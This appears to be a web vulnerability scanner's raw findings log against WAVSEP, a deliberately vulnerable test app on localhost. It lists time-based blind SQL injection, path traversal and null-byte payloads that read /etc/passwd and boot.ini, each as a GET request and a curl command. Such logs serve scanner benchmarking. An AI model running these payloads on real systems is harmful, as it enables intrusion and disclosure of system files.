GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=sleep%287%29%231"
Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=sleep%287%29%231"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
